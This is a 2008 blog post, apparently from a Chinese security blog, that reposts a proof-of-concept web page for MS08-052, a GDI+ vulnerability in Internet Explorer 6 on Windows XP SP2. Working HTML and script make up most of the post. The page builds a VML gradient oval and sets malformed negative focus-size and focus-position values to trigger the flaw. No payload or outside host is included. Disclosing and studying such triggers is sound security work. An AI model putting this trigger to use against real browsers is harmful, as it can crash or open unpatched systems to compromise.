MS Internet Explorer GDI+ Proof of Concept (MS08-052)

    [多云 September 29, 2008 20:40 | by !4p47hy ]
MS Internet Explorer GDI+ Proof of Concept (MS08-052)
<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180

Credit:
John Smith,
Evil Fingers

Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>

<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">

<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>

<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');

ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>


Tags: , , , , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(7810)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive